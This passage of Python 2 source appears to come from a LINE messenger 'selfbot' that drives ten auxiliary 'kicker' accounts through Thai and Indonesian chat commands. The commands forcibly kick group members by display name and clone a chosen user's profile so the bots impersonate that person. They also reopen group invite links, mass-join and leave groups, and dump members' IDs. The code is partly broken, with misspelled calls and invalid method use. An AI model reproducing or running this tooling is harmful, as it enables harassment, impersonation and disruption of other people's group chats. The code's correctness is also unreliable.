# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
ki1.leaveGroup(msg.to)
ki2.leaveGroup(msg.to)
# ki3.leaveGroup(msg.to)
# ki4.leaveGroup(msg.to)
# ki5.leaveGroup(msg.to)
# ki6.leaveGroup(msg.to)
# ki7.leaveGroup(msg.to)
# ki8.leaveGroup(msg.to)
# ki9.leaveGroup(msg.to)
# ki10.leaveGroup(msg.to)
ki10.leaveGroup(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ticket)
ki2.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki3.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki4.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki5.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki6.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki7.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki8.acceptGroupInvitationByTicket(msg.to,Ticket)
# ki9.acceptGroupInvitationByTicket(msg.to,Ticket)
ki10.acceptGroupInvitationByTicket(msg.to,Ticket)
G = cl.getGroup(msg.to)
ginfo = cl.getGroup(msg.to)
G.preventJoinByTicket = True
ki1.updateGroup(G)
print "kicker ok"
G.preventJoinByTicket(G)
ki1.updateGroup(G)
#================================================#
elif msg.text in ["Gcreator:inv","เชิญเเอทมิน"]:
if msg.from_ in admin:
ginfo = cl.getGroup(msg.to)
gCreator = ginfo.creator.mid
try:
cl.findAndAddContactsByMid(gCreator)
cl.inviteIntoGroup(msg.to,[gCreator])
print "success inv gCreator"
except:
pass
#============================
elif "คิก1 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก1 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki1.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki1.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "คิกเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก2 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก2 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki2.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki2.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "คิกเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก3 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก3 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki3.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki3.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "คิกเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก4 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก4 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki4.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki4.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "คิกเกอร์ 4.👌\nแปลงร่าง อวตาง\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก5 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก5 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki5.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki5.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "คิกเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก6 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก6 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki6.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki6.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "คิกเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก7 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก7 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki7.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki7.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "คิกเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก8 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก8 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki8.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki8.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "คิกเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก9 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก9 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki9.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki9.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "คิกเกอร์ 9.👌\nแปลงร้าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
elif "คิก10 แปลงร่าง @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิก10 แปลงร่าง @","")
_nametarget = _name.rstrip(' ')
gs = ki10.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
ki10.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "คิกเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#=======================================================#
elif "คิกทั้งหมด @" in msg.text:
print "[COPY] Ok"
_name = msg.text.replace("คิกทั้งหมด @","")
_nametarget = _name.rstrip(' ')
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _nametarget == g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendText(msg.to, "Not Found...")
else:
for target in targets:
try:
ki1.CloneContactProfile(target)
ki1.sendText(msg.to, "คิกเกอร์ 1.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki2.CloneContactProfile(target)
ki2.sendText(msg.to, "คิกเกอร์ 2.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki3.CloneContactProfile(target)
ki3.sendText(msg.to, "คิกเกอร์ 3.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki4.CloneContactProfile(target)
ki4.sendText(msg.to, "คิกเกอร์ 4.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki5.CloneContactProfile(target)
ki5.sendText(msg.to, "คิกเกอร์ 5.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki6.CloneContactProfile(target)
ki6.sendText(msg.to, "คิกเกอร์ 6.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki7.CloneContactProfile(target)
ki7.sendText(msg.to, "คิกเกอร์ 7.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki8.CloneContactProfile(target)
ki8.sendText(msg.to, "คิกเกอร์ 8.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki9.CloneContactProfile(target)
ki9.sendText(msg.to, "คิกเกอร์ 9.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
ki10.CloneContactProfile(target)
ki10.sendText(msg.to, "คิกเกอร์ 10.👌\nแปลงร่าง อวตาล\nเสร็จเรียบร้อย (^_^)")
except Exception as e:
print e
#====================================
#================================
elif "Nk: " in msg.text:
if msg.from_ in Creator:
X = cl.getGroup(msg.to)
X.preventJoinByTicket = False
cl.updateGroup(X)
invsend = 0
Ti = cl.reissueGroupTicket(msg.to)
ki1.acceptGroupInvitationByTicket(msg.to,Ti)
G = ki2.getGroup(msg.to)
G.preventJoinByTicket = True
ki3.updateGroup(G)
nk0 = msg.text.replace("Nk: ","")
nk1 = nk0.lstrip()
nk2 = nk1.replace("@","")
nk3 = nk2.rstrip()
_name = nk3
targets = []
for s in X.members:
if _name in s.displayName:
targets.append(s.mid)
if targets == []:
sendMessage(msg.to,"user does not exist")
pass
else:
for target in targets:
if target not in admin:
ki1.kickoutFromGroup(msg.to,[target])
ki1.leaveGroup(msg.to)
ki2sendText(msg.to,"Succes BosQ")
ki3.sendText(msg.to,"Pakyu~")
else:
cl.sendText(msg.to,"Admin Detected")
else:
cl.sendText(msg.to,"Lu sape!")
#=================================
elif msg.text in ["Backup:on","Backup on","เปิด ดึงกลับ","เปิดการเชิญกลับ"]:
if wait["Backup"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup On\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah on Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Backup:off","Backup off","ปิด ดีงกลับ","ปิดการเชิญกลับ"]:
if wait["Backup"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
wait["Backup"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Backup Off\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"Sudah off Bos\n\n"+ datetime.today().strftime('%H:%M:%S'))
#===========================================#
elif msg.text in ["Reject","ลบรัน"]:
gid = cl.getGroupIdsInvited()
for i in gid:
cl.rejectGroupInvitation(i)
if wait["lang"] == "JP":
cl.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["ลบ"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"ปฎิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
#=============================================#
elif msg.text in ["Login","ขอลิ้ง"]:
if not LINEVITLogged:
lgncall = msg.to
ki1.login(qr=True,callback=logincall)
ki1.loginResult()
user2 = ki1.getProfile().mid
LINEVITLogged = True
now2 = datetime.datetime.now()
nowT = datetime.datetime.strftime(now2,"%H")
nowM = datetime.datetime.strftime(now2,"%M")
nowS = datetime.datetime.strftime(now2,"%S")
tm = "\n\n"+nowT+":"+nowM+":"+nowS
cl.sendText(user1,"ล็อกอินสำเร็จ พร้อมใช้งานแล้ว (`・ω・´)"+tm)
else:
cl.sendText(msg.to,"ได้ทำการล็อคอินไปแล้ว")
elif msg.text.lower() == ".":
gs = []
try:
gs = cl.getGroup(msg.to).members
except:
try:
gs = cl.getRoom(msg.to).contacts
except:
pass
tlist = ""
for i in gs:
tlist = tlist+i.displayName+" "+i.mid+"\n\n"
if AsulLogged == True:
try:
ki1.sendText(user1,tlist)
except:
ki1.new_post(tlist)
else:
cl.sendText(msg.to,"ยังไม่ได้ล็อคอิน")
#========================================#
elif msg.text in ["Reject1","คิก1 ลบรัน"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"คิกเกอร์ 1\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject2","คิก2 ลบรัน"]:
gid = ki2.getGroupIdsInvited()
for i in gid:
ki2.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki2.sendText(msg.to,"คิกเกอร์ 2\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject3","คิก3 ลบรัน"]:
gid = ki3.getGroupIdsInvited()
for i in gid:
ki3.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki3.sendText(msg.to,"คิกเกอร์ 3\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject4","คิก4 ลบรัน"]:
gid = ki4.getGroupIdsInvited()
for i in gid:
ki4.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki4.sendText(msg.to,"คิกเกอร์ 4\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject5","คิก5 ลบรัน"]:
gid = ki5.getGroupIdsInvited()
for i in gid:
ki5.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki5.sendText(msg.to,"คิกเกอร์ 5\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject6","คิก6 ลบรัน"]:
gid = ki6.getGroupIdsInvited()
for i in gid:
ki6.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki6.sendText(msg.to,"คิกเกอร์ 6\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject7","คิก7 ลบรัน"]:
gid = ki7.getGroupIdsInvited()
for i in gid:
ki7.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki7.sendText(msg.to,"คิกเกอร์ 7\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject8","คิก8 ลบรัน"]:
gid = ki8.getGroupIdsInvited()
for i in gid:
ki8.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki8.sendText(msg.to,"คิกเกอร์ 8\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject9","คิก9 ลบรัน"]:
gid = ki9.getGroupIdsInvited()
for i in gid:
ki9.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki9.sendText(msg.to,"คิกเกอร์ 9\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
elif msg.text in ["Reject10","คิก10 ลบรัน"]:
gid = ki10.getGroupIdsInvited()
for i in gid:
ki10.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki10.sendText(msg.to,"คิกเกอร์ 10\nปฏิเสธกลุ่มเชิญเรียบร้อยแล้ว.👌")
else:
cl.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Y1 rgroups","Y1 rgroup"]:
gid = ki1.getGroupIdsInvited()
for i in gid:
ki1.rejectGroupInvitation(i)
if wait["lang"] == "JP":
ki1.sendText(msg.to,"Bot All invitations is clean")
else:
ki1.sendText(msg.to,"拒绝了全部的邀请。")
elif msg.text in ["Add:on","เปิด เพิ่มเพื่อน","Auto add:on","Add on"]:
if wait["autoAdd"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah on Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah on Bosqu")
elif msg.text in ["Add:off","Auto add off","ปิด เพิ่มเพื่อน","Add off"]:
if wait["autoAdd"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Sudah off Bosqu")
else:
cl.sendText(msg.to,"Ok Bosqu")
else:
wait["autoAdd"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Ok Bosqu")
else:
cl.sendText(msg.to,"Sudah off Bosqu")
elif msg.text in ["ลบแชต"]:
cl.removeAllMessages(op.param2)
cl.sendText(msg.to,"ทำการลบเรียบร้อย👌")
cl.sendText(msg.to,"Ok")
# elif "รัน @" in msg.text:
# _name = msg.text.replace("รัน @","")
# _nametarget = _name.rstrip(' ')
# gs = cl.getGroup(msg.to)
# for g in gs.members:
# if _nametarget == g.displayName:
# cl.sendText(msg.to,"เริ่มทำการรัน")
# cl.sendText(g.mid,"[☬Ŧ€ΆM฿❂Ŧ↔Pђãỳãƒir€☬]\n[By.☬ARIFISTIFIK☬]\n http://line.me/ti/p/arif.mh")
# cl.sendText(msg.to, "ทำการรันเรียบร้อย")
# print "Done spam"
#========================================
elif msg.text.lower() == 'ออน':
cl.sendText(msg.to, "โปรดรอสักครู่....")
eltime = time.time() - mulai
van = "[SELF BOT]\n[By.☬ARIFISTIFIK☬]\n\nระยะเวลาที่บอททำงาน\n"+waktu(eltime)
cl.sendText(msg.to,van)
#========================================
elif "Message set:" in msg.text:
wait["message"] = msg.text.replace("Message set:","")
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif "Add message: " in msg.text:
wait["message"] = msg.text.replace("Add message: ","")
if wait["lang"] == "JP":
cl.sendText(msg.to,"message changed\n\n"+ datetime.today().strftime('%H:%M:%S'))
else:
cl.sendText(msg.to,"done。\n\n"+ datetime.today().strftime('%H:%M:%S'))
elif msg.text in ["Message","Com"]:
if wait["lang"] == "JP":
cl.sendText(msg.to,"message change to\n\n" + wait["message"])
else:
cl.sendText(msg.to,"The automatic appending information is set as follows。\n\n" + wait["message"])
elif "Coms set:" in msg.text:
c = msg.text.replace("คอมเม้น:","Coms set:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif "Add comment: " in msg.text:
c = msg.text.replace("Add comment: ","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"String that can not be changed")
else:
wait["comment"] = c
cl.sendText(msg.to,"changed\n\n" + c)
elif msg.text in ["เปิด คอมเม้น","Com on","Comment:on"]:
if wait["commentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
else:
wait["commentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["ปิด คอมเม้น","Com off","Comment:off"]:
if wait["commentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
else:
wait["commentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"Done")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Comment","Coms"]:
cl.sendText(msg.to,"message changed to\n\n" + str(wait["comment"]))
elif msg.text in ["HHX1","Hhx1"]:
cl.sendText(msg.to,"[เช็คข้อความต้อนรับของคุณ]\n\n" + str(wait["acomment"]))
elif msg.text in ["HHX2","Hhx2"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนออกจากกลุ่ม]\n\n" + str(wait["bcomment"]))
elif msg.text in ["HHX3","Hhx3"]:
cl.sendText(msg.to,"[เช็คข้อความกล่าวถึงคนลบสมาชิก]\n\n" + str(wait["ccomment"]))
elif "Hhx1:" in msg.text:
c = msg.text.replace("Hhx1:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["acomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความต้อนรับ👌\n\n" + c)
elif "Hhx2:" in msg.text:
c = msg.text.replace("Hhx2:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["bcomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนออกจากกลุ่ม👌\n\n" + c)
elif "Hhx3:" in msg.text:
c = msg.text.replace("Hhx3:","")
if c in [""," ","\n",None]:
cl.sendText(msg.to,"เกิดข้อผิดพลาด..!!")
else:
wait["ccomment"] = c
cl.sendText(msg.to,"➠ ตั้งค่าข้อความกล่าวถึงคนลบสมาชิก👌\n\n" + c)
elif msg.text in ["Hhx1 on"]:
if wait["acommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["acommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx2 on"]:
if wait["bcommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["bcommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx3 on"]:
if wait["ccommentOn"] == True:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
else:
wait["ccommentOn"] = True
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ เปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already on")
elif msg.text in ["Hhx1 off"]:
if wait["acommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["acommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความต้อนรับเเล้ว👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx2 off"]:
if wait["bcommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["bcommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนออกจากกลุ่ม👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Hhx3 off"]:
if wait["ccommentOn"] == False:
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
else:
wait["ccommentOn"] = False
if wait["lang"] == "JP":
cl.sendText(msg.to,"➠ ปิดข้อความกล่าวถึงคนลบสมาชิก👌")
else:
cl.sendText(msg.to,"Already off")
elif msg.text in ["Gurl"]:
if msg.toType == 2:
uye = random.choice(KAC)
x = cl.getGroup(msg.to)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
uye.updateGroup(x)
gurl = uye.reissueGroupTicket(msg.to)
uye.sendText(msg.to,"line://ti/g/" + gurl)
else:
if wait["lang"] == "JP":
uye.sendText(msg.to,"Can not be used outside the group")
else:
uye.sendText(msg.to,"Not for use less than group")
elif "Ambil QR: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Ambil QR: ","")
gurl = cl.reissueGroupTicket(gid)
cl.sendText(msg.to,"line://ti/g/" + gurl)
else:
cl.sendText(msg.to,"Not for use less than group")
elif "Y1 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y1 gurl: ","")
x = ki1.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki1.updateGroup(x)
gurl = ki1.reissueGroupTicket(gid)
ki1.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki1.sendText(msg.to,"Not for use less than group")
elif "Y2 gurl: " in msg.text:
if msg.toType == 2:
gid = msg.text.replace("Y2 gurl: ","")
x = ki2.getGroup(gid)
if x.preventJoinByTicket == True:
x.preventJoinByTicket = False
ki2.updateGroup(x)
gurl = ki2.reissueGroupTicket(gid)
ki2.sendText(msg.to,"line://ti/g/" + gurl)
else:
ki2.sendText(msg.to,"Not for use less than group")
#========================================
elif msg.text in ["Comment bl "]:
wait["wblack"] = True
cl.sendText(msg.to,"add to comment bl")
elif msg.text in ["Comment wl "]:
wait["dblack"] = True
cl.sendText(msg.to,"wl to comment bl")
elif msg.text in ["Comment bl confirm"]:
if wait["commentBlack"] == {}:
cl.sendText(msg.to,"confirmed")
else:
cl.sendText(msg.to,"Blacklist s")
mc = ""
for mi_d in wait["commentBlack"]:
mc += "・" +cl.getContact(mi_d).displayName + "\n"
cl.sendText(msg.to,mc)
elif msg.text in ["เปิด นาฬิกา","Clock:on","Clock on","Jam on","Jam:on"]:
if wait["clock"] == True:
cl.sendText(msg.to,"already on")
else:
wait["clock"] = True
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"done")
elif msg.text in ["ปิด นาฬิกา","Clock:off","Clock off","Jam off","Jam:off"]:
if wait["clock"] == False:
cl.sendText(msg.to,"already off")
else:
wait["clock"] = False
cl.sendText(msg.to,"done")
elif "ตั้งชื่อ: " in msg.text:
n = msg.text.replace("ตั้งชื่อ: ","")
if len(n.decode("utf-8")) > 13:
cl.sendText(msg.to,"changed")
else:
wait["cName"] = n
cl.sendText(msg.to,"Changed to:\n\n" + n)
elif msg.text in ["Up"]:
if wait["clock"] == True:
now2 = datetime.now()
nowT = datetime.strftime(now2,"༺%H:%M༻")
profile = cl.getProfile()
profile.displayName = wait["cName"] + nowT
cl.updateProfile(profile)
cl.sendText(msg.to,"Refresh to update")
else:
cl.sendText(msg.to,"Please turn on the name clock")
elif "/ " in msg.text:
bahasa_awal = 'id'
bahasa_tujuan = 'id'
kata = msg.text.replace("/ ","")
url = 'https://translate.google.com/m?sl=%s&tl=%s&ie=UTF-8&prev=_m&q=%s' % (bahasa_awal, bahasa_tujuan, kata.replace(" ", "+"))
agent = {'User-Agent':'Mozilla/5.0'}
cari_hasil = 'class="t0">'
request = urllib2.Request(url, headers=agent)
page = urllib2.urlopen(request).read()
result = page[page.find(cari_hasil)+len(cari_hasil):]
